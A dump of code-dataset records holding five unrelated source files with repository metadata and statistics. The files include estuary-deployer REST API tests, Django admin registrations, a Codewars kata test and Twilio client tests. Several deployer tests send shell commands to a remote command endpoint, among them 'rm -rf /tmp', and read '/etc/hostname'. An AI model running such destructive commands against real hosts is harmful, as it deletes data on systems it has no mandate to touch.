saas/dataops/api/dataset/APP-META-PRIVATE/postrun/dataset/entry.py
|
iuskye/SREWorks
|
a2a7446767d97ec5f6d15bd00189c42150d6c894
|
[
"Apache-2.0"
] | 407
|
2022-03-16T08:09:38.000Z
|
2022-03-31T12:27:10.000Z
|
saas/dataops/api/dataset/APP-META-PRIVATE/postrun/dataset/entry.py
|
Kwafoor/SREWorks
|
37a64a0a84b29c65cf6b77424bd2acd0c7b42e2b
|
[
"Apache-2.0"
] | 25
|
2022-03-22T04:27:31.000Z
|
2022-03-30T08:47:28.000Z
|
saas/dataops/api/dataset/APP-META-PRIVATE/postrun/dataset/entry.py
|
Kwafoor/SREWorks
|
37a64a0a84b29c65cf6b77424bd2acd0c7b42e2b
|
[
"Apache-2.0"
] | 109
|
2022-03-21T17:30:44.000Z
|
2022-03-31T09:36:28.000Z
|
# coding: utf-8
from . import dataset_interface_init
def init():
dataset_interface_init.add_interfaces()
| 14
| 43
| 0.758929
| 15
| 112
| 5.333333
| 0.733333
| 0.4
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010526
| 0.151786
| 112
| 7
| 44
| 16
| 0.831579
| 0.116071
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
c1b8b52086119756d69b9ade1801ddf2513d8aeb
| 159
|
py
|
Python
|
product/admin.py
|
MohammadReza-Jafari/Gizshop_local_api
|
217b841995462540f4b20ea9a3c525097a0ff347
|
[
"MIT"
] | null | null | null |
product/admin.py
|
MohammadReza-Jafari/Gizshop_local_api
|
217b841995462540f4b20ea9a3c525097a0ff347
|
[
"MIT"
] | 8
|
2021-04-08T21:57:39.000Z
|
2022-03-12T00:45:22.000Z
|
product/admin.py
|
MohammadReza-Jafari/Gizshop_local_api
|
217b841995462540f4b20ea9a3c525097a0ff347
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from . import models
admin.site.register(models.Product)
admin.site.register(models.Color)
admin.site.register(models.Image)
| 22.714286
| 35
| 0.81761
| 23
| 159
| 5.652174
| 0.478261
| 0.207692
| 0.392308
| 0.530769
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075472
| 159
| 6
| 36
| 26.5
| 0.884354
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.4
| 0
| 0.4
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
de1595644c6df1e3df752abbaf74c8d2112ba14b
| 17,995
|
py
|
Python
|
tests/rest_kubectl/flask_rest_test.py
|
estuaryoss/estuary-deployer
|
21f5c4d54122ad8e0cd8f881fc6481b8b30fa432
|
[
"Apache-2.0"
] | 1
|
2021-04-05T11:12:08.000Z
|
2021-04-05T11:12:08.000Z
|
tests/rest_kubectl/flask_rest_test.py
|
estuaryoss/estuary-deployer
|
21f5c4d54122ad8e0cd8f881fc6481b8b30fa432
|
[
"Apache-2.0"
] | null | null | null |
tests/rest_kubectl/flask_rest_test.py
|
estuaryoss/estuary-deployer
|
21f5c4d54122ad8e0cd8f881fc6481b8b30fa432
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
import unittest
import requests
import yaml
from flask import json
from parameterized import parameterized
from requests_toolbelt.utils import dump
from rest.api.constants.api_code import ApiCode
from rest.api.responsehelpers.error_message import ErrorMessage
class FlaskServerTestCase(unittest.TestCase):
server_base = "http://localhost:8080"
server = "{}/kubectl".format(server_base)
expected_version = "4.2.3"
sleep_before_container_up = 5
def test_env_endpoint(self):
response = requests.get(self.server + "/env")
body = json.loads(response.text)
self.assertEqual(response.status_code, 200)
self.assertGreaterEqual(len(body.get('description')), 7)
self.assertIn("/variables", body.get('description')["VARS_DIR"])
# self.assertEqual(body.get('message')["TEMPLATES_DIR"], "/data")
self.assertEqual(body.get('message'), ErrorMessage.HTTP_CODE.get(ApiCode.SUCCESS.value))
self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
self.assertIsNotNone(body.get('timestamp'))
@parameterized.expand([
("ENV_TYPE", "DOCKER")
])
def test_env_load_from_props(self, env_var, expected_value):
response = requests.get(self.server + "/env/" + env_var)
body = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(body.get("message"), ErrorMessage.HTTP_CODE.get(ApiCode.SUCCESS.value))
self.assertEqual(body.get('description'), expected_value)
self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
self.assertIsNotNone(body.get('timestamp'))
self.assertIsNotNone(body.get('path'))
def test_setenv_endpoint_jsonwithvalues_p(self):
payload = {"a": "b", "FOO2": "BAR1"}
headers = {'Content-type': 'application/json'}
response = requests.post(self.server + "/env", data=json.dumps(payload),
headers=headers)
body = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(body.get('description'), payload)
self.assertEqual(body.get("message"), ErrorMessage.HTTP_CODE.get(ApiCode.SUCCESS.value))
self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
self.assertIsNotNone(body.get('timestamp'))
self.assertIsNotNone(body.get('path'))
def test_ping_endpoint(self):
response = requests.get(self.server + "/ping")
body = response.json()
headers = response.headers
self.assertEqual(response.status_code, 200)
self.assertEqual(body.get('description'), "pong")
self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
self.assertIsNotNone(body.get('timestamp'))
self.assertEqual(body.get('path'), "/kubectl/ping?")
self.assertEqual(len(headers.get('X-Request-ID')), 16)
def test_ping_endpoint_xid_set_by_client(self):
xid = 'whatever'
headers = {'X-Request-ID': xid}
response = requests.get(self.server + "/ping", headers=headers)
body = json.loads(response.text)
headers = response.headers
self.assertEqual(response.status_code, 200)
self.assertEqual(body.get('description'), "pong")
self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
self.assertIsNotNone(body.get('timestamp'))
self.assertEqual(headers.get('X-Request-ID'), xid)
def test_about_endpoint(self):
response = requests.get(self.server + "/about")
name = "estuary-deployer"
body = json.loads(response.text)
self.assertEqual(response.status_code, 200)
self.assertIsInstance(body.get('description'), dict)
self.assertEqual(body.get('message'), ErrorMessage.HTTP_CODE.get(ApiCode.SUCCESS.value))
self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(body.get('name'), name)
self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
self.assertIsNotNone(body.get('timestamp'))
def test_about_endpoint_unauthorized(self):
headers = {'Token': "invalidtoken"}
response = requests.get(self.server + "/about", headers=headers)
service_name = "estuary-deployer"
body = response.json()
headers = response.headers
self.assertEqual(response.status_code, 401)
self.assertEqual(body.get('description'), "Invalid Token")
self.assertEqual(body.get('name'), service_name)
self.assertEqual(body.get('message'), ErrorMessage.HTTP_CODE.get(ApiCode.UNAUTHORIZED.value))
self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(body.get('code'), ApiCode.UNAUTHORIZED.value)
self.assertIsNotNone(body.get('timestamp'))
self.assertEqual(len(headers.get('X-Request-ID')), 16)
# def test_swagger_endpoint(self):
# response = requests.get(self.server_base + "/apidocs")
#
# body = response.text
# self.assertEqual(response.status_code, 200)
# self.assertTrue(body.find("html") >= 0)
#
# def test_swagger_endpoint_swagger_still_accesible(self):
# headers = {'Token': 'whateverinvalid'}
# response = requests.get(self.server_base + "/apidocs", headers=headers)
#
# body = response.text
# self.assertEqual(response.status_code, 200)
# self.assertTrue(body.find("html") >= 0)
#
# def test_swagger_yml_endpoint(self):
# response = requests.get(self.server + "/swagger/swagger.json")
#
# self.assertEqual(response.status_code, 200)
#
# def test_swagger_yml_swagger_still_accesible(self):
# headers = {'Token': 'whateverinvalid'}
# response = requests.get(self.server + "/swagger/swagger.json", headers=headers)
#
# self.assertEqual(response.status_code, 200)
@parameterized.expand([
("json.j2", "json.json"),
("yml.j2", "yml.yml")
])
def test_rend_endpoint(self, template, variables):
response = requests.get(self.server + f"/render/{template}/{variables}", Loader=yaml.Loader)
body = yaml.safe_load(response.text)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(body), 3)
@parameterized.expand([
("json.j2", "doesnotexists.json"),
("yml.j2", "doesnotexists.yml")
])
def test_rend_endpoint(self, template, variables):
expected = f"Exception([Errno 2] No such file or directory:"
response = requests.get(self.server + f"/render/{template}/{variables}")
body = response.json()
self.assertEqual(response.status_code, 500)
self.assertIn(expected, body.get("description"))
@parameterized.expand([
("doesnotexists.j2", "json.json"),
("doesnotexists.j2", "yml.yml")
])
def test_rend_endpoint(self, template, variables):
expected = f"Exception({template})"
response = requests.get(self.server + f"/render/{template}/{variables}")
body = response.json()
self.assertEqual(response.status_code, 500)
self.assertEqual(expected, body.get("description"))
# @parameterized.expand([
# ("standalone.yml", "variables.yml")
# ])
# @unittest.skipIf(os.environ.get('TEMPLATES_DIR') == "inputs/templates", "Skip on VM")
# def test_rendwithenv_endpoint(self, template, variables):
# payload = {'DATABASE': 'mysql56', 'IMAGE': 'latest'}
# headers = {'Content-type': 'application/json'}
#
# response = requests.post(self.server + f"/render/{template}/{variables}", data=json.dumps(payload),
# headers=headers)
#
# print(dump.dump_all(response))
# body = yaml.safe_load(response.text)
# self.assertEqual(response.status_code, 200)
# self.assertEqual(len(body.get("services")), 2)
# self.assertEqual(int(body.get("version")), 3)
def test_getdeployerfile_p(self):
headers = {
'Content-type': 'application/json',
'File-Path': '/etc/hostname'
}
response = requests.get(self.server + f"/file", headers=headers)
self.assertEqual(response.status_code, 200)
self.assertGreater(len(response.text), 0)
def test_getdeployerfile_n(self):
headers = {
'Content-type': 'application/json',
'File-Path': '/etc/dummy'
}
response = requests.get(self.server + f"/file", headers=headers)
body = response.json()
headers = response.headers
self.assertEqual(response.status_code, 500)
self.assertEqual(body.get('message'),
ErrorMessage.HTTP_CODE.get(ApiCode.GET_FILE_FAILURE.value))
self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(body.get('code'), ApiCode.GET_FILE_FAILURE.value)
self.assertIsNotNone(body.get('timestamp'))
self.assertEqual(len(headers.get('X-Request-ID')), 16)
def test_getdeployerfile_missing_param_n(self):
header_key = 'File-Path'
headers = {'Content-type': 'application/json'}
response = requests.post(self.server + f"/file", headers=headers)
body = response.json()
self.assertEqual(response.status_code, 500)
self.assertEqual(body.get('message'),
ErrorMessage.HTTP_CODE.get(ApiCode.HTTP_HEADER_NOT_PROVIDED.value) % header_key)
self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(body.get('code'), ApiCode.HTTP_HEADER_NOT_PROVIDED.value)
self.assertIsNotNone(body.get('timestamp'))
def test_getenv_endpoint_p(self):
env_var = "VARS_DIR"
response = requests.get(self.server + f"/env/{env_var}")
body = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(body.get('message'), ErrorMessage.HTTP_CODE.get(ApiCode.SUCCESS.value))
self.assertIsNotNone(body.get('description'))
self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
self.assertIsNotNone(body.get('timestamp'))
def test_getenv_endpoint_n(self):
env_var = "alabalaportocala"
response = requests.get(self.server + f"/env/{env_var}")
body = response.json()
self.assertEqual(response.status_code, 200)
self.assertEqual(body.get('message'), ErrorMessage.HTTP_CODE.get(ApiCode.SUCCESS.value))
self.assertEqual(body.get('description'), None)
self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
self.assertIsNotNone(body.get('timestamp'))
@parameterized.expand([
"{\"file\": \"/dummy/config.properties\", \"content\": \"ip=10.0.0.1\\nrequest_sec=100\\nthreads=10\\ntype=dual\"}"
])
def test_uploadfile_n(self, payload):
headers = {'Content-type': 'application/json'}
mandatory_header_key = 'File-Path'
response = requests.post(
self.server + f"/file",
data=payload, headers=headers)
body = response.json()
print(dump.dump_all(response))
self.assertEqual(response.status_code, 500)
self.assertEqual(body.get('message'),
ErrorMessage.HTTP_CODE.get(ApiCode.HTTP_HEADER_NOT_PROVIDED.value) % mandatory_header_key)
self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(body.get('code'), ApiCode.HTTP_HEADER_NOT_PROVIDED.value)
self.assertIsNotNone(body.get('timestamp'))
@parameterized.expand([
""
])
def test_uploadfile_n(self, payload):
headers = {
'Content-type': 'application/json',
'File-Path': '/tmp/config.properties'
}
response = requests.post(
self.server + f"/file",
data=payload, headers=headers)
body = response.json()
print(dump.dump_all(response))
self.assertEqual(response.status_code, 500)
self.assertEqual(body.get('message'),
ErrorMessage.HTTP_CODE.get(ApiCode.EMPTY_REQUEST_BODY_PROVIDED.value))
self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(body.get('code'), ApiCode.EMPTY_REQUEST_BODY_PROVIDED.value)
self.assertIsNotNone(body.get('timestamp'))
@parameterized.expand([
"{\"file\": \"/tmp/config.properties\", \"content\": \"ip=10.0.0.1\\nrequest_sec=100\\nthreads=10\\ntype=dual\"}"
])
def test_uploadfile_p(self, payload):
headers = {
'Content-type': 'application/json',
'File-Path': 'config.properties'
}
response = requests.put(
self.server + f"/file",
data=payload, headers=headers)
body = response.json()
print(dump.dump_all(response))
self.assertEqual(response.status_code, 200)
self.assertEqual(body.get('message'),
ErrorMessage.HTTP_CODE.get(ApiCode.SUCCESS.value))
self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
self.assertIsNotNone(body.get('timestamp'))
def test_executecommand_n(self):
command = "abracadabra" # not working on linux
response = requests.post(
self.server + f"/command",
data=command)
body = response.json()
print(dump.dump_all(response))
self.assertEqual(response.status_code, 200)
self.assertEqual(body.get('message'),
ErrorMessage.HTTP_CODE.get(ApiCode.SUCCESS.value))
self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
self.assertNotEqual(body.get('description').get('commands').get(command).get('details').get('code'), 0)
self.assertEqual(body.get('description').get('commands').get(command).get('details').get('out'), "")
self.assertNotEqual(body.get('description').get('commands').get(command).get('details').get('err'), "")
self.assertGreater(body.get('description').get('commands').get(command).get('details').get('pid'), 0)
self.assertIsInstance(body.get('description').get('commands').get(command).get('details').get('args'), list)
self.assertIsNotNone(body.get('timestamp'))
def test_executecommand_p(self):
command = "cat /etc/hostname"
response = requests.post(
self.server + f"/command",
data=command)
body = response.json()
print(dump.dump_all(response))
self.assertEqual(response.status_code, 200)
self.assertEqual(body.get('message'),
ErrorMessage.HTTP_CODE.get(ApiCode.SUCCESS.value))
self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
self.assertEqual(body.get('description').get('commands').get(command).get('details').get('code'), 0)
self.assertNotEqual(body.get('description').get('commands').get(command).get('details').get('out'), "")
self.assertEqual(body.get('description').get('commands').get(command).get('details').get('err'), "")
self.assertGreater(body.get('description').get('commands').get(command).get('details').get('pid'), 0)
self.assertIsInstance(body.get('description').get('commands').get(command).get('details').get('args'), list)
self.assertIsNotNone(body.get('timestamp'))
def test_executecommand_rm_allowed_p(self):
command = "rm -rf /tmp"
response = requests.post(
self.server + f"/command",
data=command)
body = response.json()
print(dump.dump_all(response))
self.assertEqual(response.status_code, 200)
self.assertEqual(body.get('message'),
ErrorMessage.HTTP_CODE.get(ApiCode.SUCCESS.value))
self.assertIsInstance(body.get('description'), dict)
self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
self.assertIsNotNone(body.get('timestamp'))
def test_both_valid_are_executed(self):
command = "rm -rf /tmp\nls -lrt"
commands = command.split("\n")
response = requests.post(
self.server + f"/command",
data=command)
body = response.json()
print(dump.dump_all(response))
self.assertEqual(response.status_code, 200)
self.assertEqual(body.get('message'),
ErrorMessage.HTTP_CODE.get(ApiCode.SUCCESS.value))
self.assertEqual(len(body.get('description').get("commands")), 2) # only 1 cmd is executed
self.assertEqual(body.get('description').get("commands").get(commands[1]).get('details').get('code'), 0)
self.assertEqual(body.get('version'), self.expected_version)
self.assertEqual(body.get('code'), ApiCode.SUCCESS.value)
self.assertIsNotNone(body.get('timestamp'))
def test_executecommand_timeout_from_client_n(self):
command = "sleep 20"
try:
requests.post(self.server + f"/command", data=command, timeout=2)
except Exception as e:
self.assertIsInstance(e, requests.exceptions.ReadTimeout)
if __name__ == '__main__':
unittest.main()
| 43.153477
| 123
| 0.643957
| 2,011
| 17,995
| 5.653904
| 0.111885
| 0.063412
| 0.11029
| 0.127704
| 0.830959
| 0.80985
| 0.783201
| 0.757168
| 0.735796
| 0.698769
| 0
| 0.010171
| 0.20778
| 17,995
| 416
| 124
| 43.257212
| 0.787388
| 0.094693
| 0
| 0.621359
| 0
| 0
| 0.1268
| 0.008187
| 0
| 0
| 0
| 0
| 0.417476
| 1
| 0.074434
| false
| 0
| 0.02589
| 0
| 0.116505
| 0.022654
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a9d1dc8a4fff9c7dbea4cccacdcd4d1e2990cd3e
| 948
|
py
|
Python
|
tests/kyu_4_tests/test_strip_url_params.py
|
the-zebulan/CodeWars
|
1eafd1247d60955a5dfb63e4882e8ce86019f43a
|
[
"MIT"
] | 40
|
2016-03-09T12:26:20.000Z
|
2022-03-23T08:44:51.000Z
|
tests/kyu_4_tests/test_strip_url_params.py
|
akalynych/CodeWars
|
1eafd1247d60955a5dfb63e4882e8ce86019f43a
|
[
"MIT"
] | null | null | null |
tests/kyu_4_tests/test_strip_url_params.py
|
akalynych/CodeWars
|
1eafd1247d60955a5dfb63e4882e8ce86019f43a
|
[
"MIT"
] | 36
|
2016-11-07T19:59:58.000Z
|
2022-03-31T11:18:27.000Z
|
import unittest
from katas.kyu_4.strip_url_params import strip_url_params
class StripURLParamsTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(strip_url_params('www.codewars.com?a=1&b=2&a=1&b=3'),
'www.codewars.com?a=1&b=2')
def test_equals_2(self):
self.assertEqual(strip_url_params('www.codewars.com?a=1&b=2&a=1&b=3',
['b']), 'www.codewars.com?a=1')
def test_equals_3(self):
self.assertEqual(strip_url_params('www.codewars.com?a=1&b=2&a=2'),
'www.codewars.com?a=1&b=2')
def test_equals_4(self):
self.assertEqual(strip_url_params('www.codewars.com?a=1&b=2&a=2',
['b']), 'www.codewars.com?a=1')
def test_equals_5(self):
self.assertEqual(strip_url_params('www.codewars.com', ['b']),
'www.codewars.com')
| 36.461538
| 78
| 0.574895
| 139
| 948
| 3.748201
| 0.18705
| 0.211132
| 0.268714
| 0.230326
| 0.738964
| 0.738964
| 0.738964
| 0.738964
| 0.738964
| 0.533589
| 0
| 0.036179
| 0.271097
| 948
| 25
| 79
| 37.92
| 0.7178
| 0
| 0
| 0.222222
| 0
| 0.111111
| 0.256329
| 0.177215
| 0
| 0
| 0
| 0
| 0.277778
| 1
| 0.277778
| false
| 0
| 0.111111
| 0
| 0.444444
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a9d6e01352f313e23504ba1f56e0152af4ccbbab
| 9,129
|
py
|
Python
|
tests/integration/voice/v1/connection_policy/test_connection_policy_target.py
|
BrimmingDev/twilio-python
|
3226b5fed92b3c2ce64f03e6b19fc4792ef7647f
|
[
"MIT"
] | 1,362
|
2015-01-04T10:25:18.000Z
|
2022-03-24T10:07:08.000Z
|
tests/integration/voice/v1/connection_policy/test_connection_policy_target.py
|
BrimmingDev/twilio-python
|
3226b5fed92b3c2ce64f03e6b19fc4792ef7647f
|
[
"MIT"
] | 299
|
2015-01-30T09:52:39.000Z
|
2022-03-31T23:03:02.000Z
|
tests/integration/voice/v1/connection_policy/test_connection_policy_target.py
|
BrimmingDev/twilio-python
|
3226b5fed92b3c2ce64f03e6b19fc4792ef7647f
|
[
"MIT"
] | 622
|
2015-01-03T04:43:09.000Z
|
2022-03-29T14:11:00.000Z
|
# coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from tests import IntegrationTestCase
from tests.holodeck import Request
from twilio.base.exceptions import TwilioException
from twilio.http.response import Response
class ConnectionPolicyTargetTestCase(IntegrationTestCase):
def test_create_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.voice.v1.connection_policies("NYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.targets.create(target="https://example.com")
values = {'Target': "https://example.com", }
self.holodeck.assert_has_request(Request(
'post',
'https://voice.twilio.com/v1/ConnectionPolicies/NYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Targets',
data=values,
))
def test_create_response(self):
self.holodeck.mock(Response(
201,
'''
{
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"connection_policy_sid": "NYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"sid": "NEaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "friendly_name",
"target": "sip:sip-box.com:1234",
"priority": 1,
"weight": 20,
"enabled": true,
"date_created": "2020-03-18T23:31:36Z",
"date_updated": "2020-03-18T23:31:36Z",
"url": "https://voice.twilio.com/v1/ConnectionPolicies/NYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Targets/NEaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
'''
))
actual = self.client.voice.v1.connection_policies("NYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.targets.create(target="https://example.com")
self.assertIsNotNone(actual)
def test_fetch_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.voice.v1.connection_policies("NYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.targets("NEXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").fetch()
self.holodeck.assert_has_request(Request(
'get',
'https://voice.twilio.com/v1/ConnectionPolicies/NYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Targets/NEXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
))
def test_fetch_response(self):
self.holodeck.mock(Response(
200,
'''
{
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"connection_policy_sid": "NYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"sid": "NEaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "friendly_name",
"target": "sip:sip-box.com:1234",
"priority": 1,
"weight": 20,
"enabled": true,
"date_created": "2020-03-18T23:31:36Z",
"date_updated": "2020-03-18T23:31:37Z",
"url": "https://voice.twilio.com/v1/ConnectionPolicies/NYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Targets/NEaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
'''
))
actual = self.client.voice.v1.connection_policies("NYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.targets("NEXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").fetch()
self.assertIsNotNone(actual)
def test_list_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.voice.v1.connection_policies("NYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.targets.list()
self.holodeck.assert_has_request(Request(
'get',
'https://voice.twilio.com/v1/ConnectionPolicies/NYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Targets',
))
def test_read_full_response(self):
self.holodeck.mock(Response(
200,
'''
{
"meta": {
"page": 0,
"page_size": 50,
"first_page_url": "https://voice.twilio.com/v1/ConnectionPolicies/NYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Targets?PageSize=50&Page=0",
"previous_page_url": null,
"url": "https://voice.twilio.com/v1/ConnectionPolicies/NYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Targets?PageSize=50&Page=0",
"next_page_url": null,
"key": "targets"
},
"targets": [
{
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"connection_policy_sid": "NYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"sid": "NEaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "friendly_name",
"target": "sip:sip-box.com:1234",
"priority": 1,
"weight": 20,
"enabled": true,
"date_created": "2020-03-18T23:31:36Z",
"date_updated": "2020-03-18T23:31:37Z",
"url": "https://voice.twilio.com/v1/ConnectionPolicies/NYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Targets/NEaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
]
}
'''
))
actual = self.client.voice.v1.connection_policies("NYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.targets.list()
self.assertIsNotNone(actual)
def test_read_empty_response(self):
self.holodeck.mock(Response(
200,
'''
{
"meta": {
"page": 0,
"page_size": 50,
"first_page_url": "https://voice.twilio.com/v1/ConnectionPolicies/NYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Targets?PageSize=50&Page=0",
"previous_page_url": null,
"url": "https://voice.twilio.com/v1/ConnectionPolicies/NYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Targets?PageSize=50&Page=0",
"next_page_url": null,
"key": "targets"
},
"targets": []
}
'''
))
actual = self.client.voice.v1.connection_policies("NYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.targets.list()
self.assertIsNotNone(actual)
def test_update_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.voice.v1.connection_policies("NYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.targets("NEXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").update()
self.holodeck.assert_has_request(Request(
'post',
'https://voice.twilio.com/v1/ConnectionPolicies/NYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Targets/NEXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
))
def test_update_response(self):
self.holodeck.mock(Response(
200,
'''
{
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"connection_policy_sid": "NYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"sid": "NEaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "updated_name",
"target": "sip:sip-updated.com:4321",
"priority": 2,
"weight": 10,
"enabled": false,
"date_created": "2020-03-18T23:31:36Z",
"date_updated": "2020-03-18T23:31:37Z",
"url": "https://voice.twilio.com/v1/ConnectionPolicies/NYaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Targets/NEaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
'''
))
actual = self.client.voice.v1.connection_policies("NYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.targets("NEXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").update()
self.assertIsNotNone(actual)
def test_delete_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.voice.v1.connection_policies("NYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.targets("NEXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").delete()
self.holodeck.assert_has_request(Request(
'delete',
'https://voice.twilio.com/v1/ConnectionPolicies/NYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Targets/NEXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
))
def test_delete_response(self):
self.holodeck.mock(Response(
204,
None,
))
actual = self.client.voice.v1.connection_policies("NYXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.targets("NEXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").delete()
self.assertTrue(actual)
| 40.215859
| 157
| 0.570051
| 677
| 9,129
| 7.545052
| 0.156573
| 0.037588
| 0.04072
| 0.048356
| 0.914252
| 0.892326
| 0.872161
| 0.872161
| 0.872161
| 0.872161
| 0
| 0.03522
| 0.318874
| 9,129
| 226
| 158
| 40.393805
| 0.786266
| 0.01194
| 0
| 0.75
| 1
| 0
| 0.249897
| 0.119274
| 0
| 0
| 0
| 0
| 0.166667
| 1
| 0.114583
| false
| 0
| 0.041667
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
